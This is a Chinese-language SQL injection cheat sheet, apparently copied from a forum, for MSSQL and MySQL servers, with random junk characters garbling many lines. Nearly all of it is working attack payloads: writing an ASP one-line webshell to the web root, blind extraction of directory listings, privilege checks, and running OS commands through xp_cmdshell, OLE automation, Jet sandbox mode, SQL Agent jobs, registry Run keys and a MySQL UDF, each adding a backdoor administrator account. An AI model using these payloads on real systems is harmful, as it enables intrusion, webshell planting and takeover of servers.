MSSQL语句导出一句话木马
+ T0 u1 C% R; u+ s6 b3 ~' T首先确定网站的WEB路径3 }4 W- i6 `$ A, \6 T2 Z4 }
;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马
9 \, F* e+ N v0 X/ e. l8 X H% N/ e2 I) r9 K- v
;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');-- 6 A6 N7 A( _ e6 K E% q3 p) H) t
//将一句话木马插入表中
a$ ?( O3 Y% p/ T+ C7 H6 K2 ^/ J* A6 q1 T( ~& i
;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';-- o: r/ G: L0 Z) K/ m
//导出一个ASP文件
7 H' P* m, i: W7 G8 S
3 H# |% b2 u& W5 ?' O& c' L5 S# Q
( \- Q7 g! |7 @5 b) X; N, H1 B& A) S关于MSSQL列目录2 H3 t7 k/ K! n) M W& E C
;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表
# Z( Z/ R$ w$ hInsert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表 _3 J4 Y8 v8 w- {3 A
! Z+ ^* f+ H; q0 M/ b
and (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录. V+ a8 a& r; f# r9 v' A& o: X
- P" e, K9 p- r8 i4 V
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段
0 y$ H. R5 l; }6 U. c4 X
9 ~; Y6 L* b) ]4 W$ }! |4 zAnd (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符4 ~; n; g9 a: ?" c7 @6 Z* Z
# }( r( s _' O; m
$ w; h1 r' c2 Y6 O0 v数据库版本和权限查看
, Y3 i' u: t* E" dand 1=(select @@VERSION) //查看详细的数据库信息./ j" e9 u" H$ v5 H
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA
- y! h, v# _1 K; B* Hand 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER
1 G( n0 ]3 }) J5 r
8 g3 A! m: S/ |+ m" X/ f7 U8 N- q8 K; l8 [( J0 z) t
1.利用xp_cmdshell执行命令
$ p* U& r+ e) K4 P* Q! qexec master..xp_cmdshell 'net user rfire 123456 /add'
8 ^2 z4 |; a& b7 \) Y& J3 U& a8 Fexec master..xp_cmdshell 'net localgroup administrators rfire /add'1 F# w( `! T+ [7 P) E
8 y( U$ f. Q0 A9 M
恢复xp_cmdshell存储过程
8 f' [) ~5 I5 C6 h3 z6 _ GExec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
& \3 z- G+ d& y2 i' \; m* ]# l# z, Y- ?) @ P
4 `' q' B6 Q- T0 `0 q2.利用SP_OAcreate和SP_OAMETHOD执行命令3 b5 b! p+ M2 {/ b! _
在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下' e* r; h- K1 p8 q( ?( }+ h
DECLARE @shell INT //建立一个@shell实体
0 Z Z, w$ e% W7 K1 F7 ]9 lEXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例7 ]9 M) [ ]$ x& C- p
EXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例. z9 }; c5 T1 B) X( S
0 ]4 J4 ]! a/ l: g% C7 K' `( R
2 T, H+ }# l8 R" x' c$ b4 ]% T% A3.利用沙盒模式7 C8 H9 r7 R# M' d$ G
先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。* I- D9 Z( I U! S
开启沙盒模式:
. K. x7 v; D6 p6 T& D' O0 i/ l) kEXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0
3 |. T* Z, O. |3 {$ ~
6 s- {/ h5 W2 O2 `8 T6 U执行命令:
0 A% y6 V# H" t0 \4 |Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');
+ _6 K0 q4 r! p0 h, t0 }, V1 ]$ x
; H* H5 L3 e G3 {! k& A
7 H- a8 Y4 L$ n% U7 H4.利用SQL代理执行命令
9 a' V6 w) h9 p: B# ?EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务
: H; ^) G2 }3 r7 [
3 z: l7 k+ ?7 e5 q! E! T7 y: H执行命令:
, x/ x: [/ Y, o7 a R3 U, w. u1 Nuse msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错2 r1 [! d3 z; g* ?
exec sp_add_job 'x'( p& v) C0 r# }/ x# _
exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业
! ], ]$ K& ?3 U: f+ k0 _; Vexec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业% w: R5 ^& a# p: R$ a: B
5 ^& w5 c) s8 A0 [5 R0 K0 l
" I9 @$ D2 G1 m
5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)" [, v. }# E+ ^/ L% V# M
EXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'
1 E! g$ u: o; N9 ~6 R6 j: a6 F* i
( f9 q( R( M1 ~% k1 o
9 t3 ]$ M( X2 D# J1 h/ H9 ]6.MYSQL的命令执行
2 S' t8 g8 [. H0 D/ aMYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)
7 C4 o+ b- p3 a' V! o首先要在su.php下导出c:\windows\udf.dll7 s& |& P: \) l7 M' G
导出后执行创建自定义函数命令:6 d9 e; Y W' E |. ?
Create Function cmdshell returns string soname 'udf.dll') k6 L; s! b, Q _+ q
执行命令
$ ?+ m* n1 u# N# Lselect cmdshell('net user rfire 123456 /add')$ L, ^; N# i0 |1 i; z
执行后删除函数 drop function cmdshell7 ~# e2 H5 g- z
|